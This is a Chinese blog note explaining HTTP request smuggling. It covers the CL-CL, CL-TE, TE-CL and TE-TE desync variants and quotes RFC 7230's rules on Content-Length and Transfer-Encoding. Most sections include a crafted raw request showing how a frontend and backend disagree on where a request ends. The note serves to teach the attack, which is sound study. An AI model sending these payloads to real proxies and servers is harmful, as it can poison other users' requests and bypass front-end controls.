HTTP Smuggling Attack 随笔

字数统计: 1.6k阅读时长: 7 min

 2019/12/18

前言

下面这张图能够直观的理解各种类型的攻击，但还是要认真看原文全部内容

成因

HTTP 1.1 两个特性 Keep-Alive & pipeline

一般此攻击主要存在于代理和后端之间

由于代理需要从后端获取大量信息、数据，且两者相对固定，所以持久化 TCP 连接是减少开销的同时加快访问速度的有效方案
代理(客户端)可能同时存在大量请求，不可能等待服务器返回上一个后再请求下一个，利用管线化(先入先出)整批提交请求而不需要先等待服务器响应

现在考虑：如果通过这两个特性，是不是存在数据包污染的可能性？

i. 持久连接

在 HTTP 1.1 中所有的连接默认都是持续连接，除非特殊声明不支持。

ii. 管线化

HTTP 管线化同时依赖于客户端和服务器的支持。遵守 HTTP/1.1 的服务器支持管线化。这并不是意味着服务器需要提供管线化的回复，而只是要求在收到管线化的请求时候不会失败。

类型

CL = Content-Length
TE = Transfer-Encoding

CL-CL

按照RFC7230规范文档，如果只包含两个CL须直接返回 400 错误

问题在于前后端假如没有严格遵守此规范，且代理后端按 CL 顺序依次进行解析

如有如下数据包

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n <- Frontend sees this
Content-Length: 5\r\n <- Backend sees this
\r\n
12345G

前端(代理)服务器获取到数据包长度为 6，将上述数据包完整转发给后端服务器
后端服务器获取数据包长度为 5，读取 5 个字符后将剩余内容放置在缓存区，认为G是下一个请求的部分内容
下一个包进入后端时，后端从缓存区读取内容，造成污染

GPOST / HTTP/1.1\r\n
Host: example.com

两个数据包整体效果

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n       <- Frontend sees this
Content-Length: 5\r\n       <- Backend sees this
\r\n
12345GPOST / HTTP/1.1\r\n
Host: example.com

---

Response : Unknown method GPOST

CL-TE

前端处理 CL，后端处理 TE

TE 中最常用的当然是 chunk 分块传输编码

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n           <- Frontend sees this
Transfer-Encoding: chunked\r\n  <- Backend sees this
\r\n
0\r\n
\r\n
GPOST / HTTP/1.1

---

Response : Unknown method GPOST

由于前段根据CL解析，得到以下请求
```
 0\r\n
 \r\n
 G
```
后端根据TE解析，认为0\r\n\r\n为结尾，后续内容属于下一个请求

TE-CL

前段处理 TE，后端处理 CL

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 3\r\n           <- Backend sees this
Transfer-Encoding: chunked\r\n  <- Frontend sees this
\r\n
6\r\n
PREFIX\r\n
0\r\n
\r\n

POST / HTTP/1.1\r\n
Host: example.com

TE-TE

这个问题主要是由于在双 TE 中，通过构造一个非法的 TE 头，导致前后端其中一个无法正常解析而选择忽略 TE 头选择 CL。所以实际为 TE-CL 或 CL-TE，特点在于数据包中会出现1CL & 2TE

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-Encoding: cow\r\n
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

可以看到由于第二个 TE 无效，所以实际为 TE-CL

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n           <- Backend sees this second
Transfer-Encoding: chunked\r\n  <- Frontend sees this
Transfer-Encoding: cow\r\n      <- Backend sees this first and ignore
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

前端通过 TE 解析，认为下面全部是有效数据

 5c\r\n
 GPOST / HTTP/1.1\r\n
 Content-Type: application/x-www-form-urlencoded\r\n
 Content-Length: 15\r\n
 \r\n
 x=1\r\n
 0\r\n
 \r\n

后端先通过 TE 解析，但 TE 值无效，忽略 TE 头选择 CL 再次进行解析，由于长度为 4 所以认为5c\r\n即为本次请求所有数据，剩下均为下次请求内容

Forcing desync

在RFC-7230 # 3.3.3有以下内容，我觉得整段放上来要好一些

3.    If a Transfer-Encoding header field is present and the chunked
    transfer coding (Section 4.1) is the final encoding, the message
    body length is determined by reading and decoding the chunked
    data until the transfer coding indicates the data is complete.

    If a Transfer-Encoding header field is present in a response and
    the chunked transfer coding is not the final encoding, the
    message body length is determined by reading the connection until
    it is closed by the server.  If a Transfer-Encoding header field
    is present in a request and the chunked transfer coding is not
    the final encoding, the message body length cannot be determined
    reliably; the server MUST respond with the 400 (Bad Request)
    status code and then close the connection.

    If a message is received with both a Transfer-Encoding and a
    Content-Length header field, the Transfer-Encoding overrides the
    Content-Length.  Such a message might indicate an attempt to
    perform request smuggling (Section 9.5) or response splitting
    (Section 9.4) and ought to be handled as an error.  A sender MUST
    remove the received Content-Length field prior to forwarding such
    a message downstream.

实际上由于我们要进行数据包污染，所以如果无论代理、后端服务器对分块数据长度有效性进行检验时，很容易触发400错误